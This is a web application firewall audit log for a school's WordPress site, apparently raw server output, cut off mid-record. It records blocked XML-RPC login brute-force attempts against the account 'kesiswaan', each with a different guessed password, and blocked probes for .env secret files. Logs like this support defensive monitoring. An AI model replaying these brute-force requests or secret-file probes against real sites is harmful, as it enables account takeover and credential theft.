X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --20bb1a09-C-- wp.getUsersBlogs kesiswaan kesiswaan@1994 --20bb1a09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --20bb1a09-E-- --20bb1a09-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081258133573 5660 (- - -) Stopwatch2: 1745081258133573 5660; combined=3965, p1=497, p2=3298, p3=0, p4=0, p5=100, sr=88, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20bb1a09-Z-- --415abe46-A-- [19/Apr/2025:23:48:38 +0700] aAPT5kruoUXZj665VUF0PQAAAM8 103.236.140.4 44404 103.236.140.4 8181 --415abe46-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --415abe46-C-- wp.getUsersBlogs kesiswaan kesiswaan@2002 --415abe46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --415abe46-E-- --415abe46-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081318286639 5573 (- - -) Stopwatch2: 1745081318286639 5573; combined=3930, p1=492, p2=3270, p3=0, p4=0, p5=99, sr=88, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --415abe46-Z-- --af205d40-A-- [19/Apr/2025:23:49:44 +0700] aAPUKEruoUXZj665VUF0SQAAAMA 103.236.140.4 44696 103.236.140.4 8181 --af205d40-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --af205d40-C-- wp.getUsersBlogs kesiswaan scotland --af205d40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af205d40-E-- --af205d40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (17+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081384480605 5378 (- - -) Stopwatch2: 1745081384480605 5378; combined=4024, p1=486, p2=3370, p3=0, p4=0, p5=99, sr=87, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af205d40-Z-- --1882aa16-A-- [19/Apr/2025:23:50:48 +0700] aAPUaA6cTFSgLAHl7PpQbAAAAAU 103.236.140.4 45040 103.236.140.4 8181 --1882aa16-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1882aa16-C-- wp.getUsersBlogs kesiswaan bethany --1882aa16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1882aa16-E-- --1882aa16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (44+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081448900476 5621 (- - -) Stopwatch2: 1745081448900476 5621; combined=4002, p1=487, p2=3345, p3=0, p4=0, p5=100, sr=85, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1882aa16-Z-- --069caf1b-A-- [19/Apr/2025:23:51:49 +0700] aAPUpUruoUXZj665VUF0dAAAAMk 103.236.140.4 45336 103.236.140.4 8181 --069caf1b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --069caf1b-C-- wp.getUsersBlogs kesiswaan astonvilla --069caf1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --069caf1b-E-- --069caf1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081509969827 5548 (- - -) Stopwatch2: 1745081509969827 5548; combined=3878, p1=492, p2=3224, p3=0, p4=0, p5=96, sr=94, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --069caf1b-Z-- --55cec335-A-- [19/Apr/2025:23:52:50 +0700] aAPU4uvDiFC_ir7MDwZU5wAAAEI 103.236.140.4 45646 103.236.140.4 8181 --55cec335-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --55cec335-C-- wp.getUsersBlogs kesiswaan Admin098123 --55cec335-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55cec335-E-- --55cec335-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (36+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081570040016 5739 (- - -) Stopwatch2: 1745081570040016 5739; combined=4093, p1=516, p2=3387, p3=0, p4=0, p5=110, sr=89, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55cec335-Z-- --bbb17b67-A-- [19/Apr/2025:23:53:53 +0700] aAPVIevDiFC_ir7MDwZU_AAAAFg 103.236.140.4 45952 103.236.140.4 8181 --bbb17b67-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --bbb17b67-C-- wp.getUsersBlogs kesiswaan verystrong --bbb17b67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbb17b67-E-- --bbb17b67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081633313442 5167 (- - -) Stopwatch2: 1745081633313442 5167; combined=4024, p1=484, p2=3325, p3=0, p4=0, p5=123, sr=86, sw=92, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbb17b67-Z-- --b5ad7d1a-A-- [19/Apr/2025:23:54:53 +0700] aAPVXUruoUXZj665VUF01gAAANc 103.236.140.4 46256 103.236.140.4 8181 --b5ad7d1a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b5ad7d1a-C-- wp.getUsersBlogs kesiswaan P@SSWORD --b5ad7d1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5ad7d1a-E-- --b5ad7d1a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081693326338 5694 (- - -) Stopwatch2: 1745081693326338 5694; combined=3879, p1=475, p2=3233, p3=0, p4=0, p5=100, sr=86, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5ad7d1a-Z-- --fefadc09-A-- [19/Apr/2025:23:55:56 +0700] aAPVnA6cTFSgLAHl7PpQ2QAAABE 103.236.140.4 46568 103.236.140.4 8181 --fefadc09-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --fefadc09-C-- wp.getUsersBlogs kesiswaan asdfghjkl --fefadc09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fefadc09-E-- --fefadc09-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081756834471 5035 (- - -) Stopwatch2: 1745081756834471 5035; combined=3924, p1=460, p2=3294, p3=0, p4=0, p5=100, sr=79, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fefadc09-Z-- --698b4020-A-- [19/Apr/2025:23:56:59 +0700] aAPV2w6cTFSgLAHl7PpQ-AAAAAo 103.236.140.4 46880 103.236.140.4 8181 --698b4020-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --698b4020-C-- wp.getUsersBlogs kesiswaan qqq --698b4020-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --698b4020-E-- --698b4020-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081819355313 5632 (- - -) Stopwatch2: 1745081819355313 5632; combined=4003, p1=492, p2=3389, p3=0, p4=0, p5=72, sr=86, sw=50, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --698b4020-Z-- --b3ae1662-A-- [19/Apr/2025:23:58:01 +0700] aAPWGevDiFC_ir7MDwZVSwAAAEg 103.236.140.4 47188 103.236.140.4 8181 --b3ae1662-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b3ae1662-C-- wp.getUsersBlogs kesiswaan caonima123 --b3ae1662-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3ae1662-E-- --b3ae1662-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081881367565 5798 (- - -) Stopwatch2: 1745081881367565 5798; combined=4067, p1=512, p2=3376, p3=0, p4=0, p5=105, sr=89, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3ae1662-Z-- --8d648975-A-- [19/Apr/2025:23:59:01 +0700] aAPWVUruoUXZj665VUF1JQAAANE 103.236.140.4 47474 103.236.140.4 8181 --8d648975-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8d648975-C-- wp.getUsersBlogs kesiswaan aaaaa --8d648975-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d648975-E-- --8d648975-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081941174561 5442 (- - -) Stopwatch2: 1745081941174561 5442; combined=3739, p1=483, p2=3095, p3=0, p4=0, p5=95, sr=89, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d648975-Z-- --1ac56b2e-A-- [20/Apr/2025:00:00:01 +0700] aAPWkUruoUXZj665VUF1QAAAAMY 103.236.140.4 47776 103.236.140.4 8181 --1ac56b2e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1ac56b2e-C-- wp.getUsersBlogs kesiswaan admin!@# --1ac56b2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ac56b2e-E-- --1ac56b2e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745082001787148 5484 (- - -) Stopwatch2: 1745082001787148 5484; combined=4122, p1=459, p2=3310, p3=0, p4=0, p5=191, sr=86, sw=162, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ac56b2e-Z-- --0b4ac10b-A-- [20/Apr/2025:00:03:54 +0700] aAPXenNa4dA2HllpK_PqRQAAAIE 103.236.140.4 48684 103.236.140.4 8181 --0b4ac10b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.59.160.222 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.59.160.222 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50 Accept: */* --0b4ac10b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b4ac10b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745082234035165 731 (- - -) Stopwatch2: 1745082234035165 731; combined=330, p1=293, p2=0, p3=0, p4=0, p5=37, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b4ac10b-Z-- --80fd7b65-A-- [20/Apr/2025:00:23:44 +0700] aAPcIHNa4dA2HllpK_PrXgAAAIQ 103.236.140.4 53284 103.236.140.4 8181 --80fd7b65-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.202 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.202 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --80fd7b65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80fd7b65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745083424799742 850 (- - -) Stopwatch2: 1745083424799742 850; combined=388, p1=284, p2=0, p3=0, p4=0, p5=104, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80fd7b65-Z-- --72f9a80b-A-- [20/Apr/2025:00:23:44 +0700] aAPcIEruoUXZj665VUF2zAAAANg 103.236.140.4 53290 103.236.140.4 8181 --72f9a80b-B-- GET /config/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.202 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.202 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --72f9a80b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72f9a80b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745083424968775 758 (- - -) Stopwatch2: 1745083424968775 758; combined=289, p1=240, p2=0, p3=0, p4=0, p5=48, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72f9a80b-Z-- --2d4e550b-A-- [20/Apr/2025:00:23:45 +0700] aAPcIUruoUXZj665VUF2zQAAAMI 103.236.140.4 53292 103.236.140.4 8181 --2d4e550b-B-- GET /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.202 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.202 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --2d4e550b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d4e550b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev 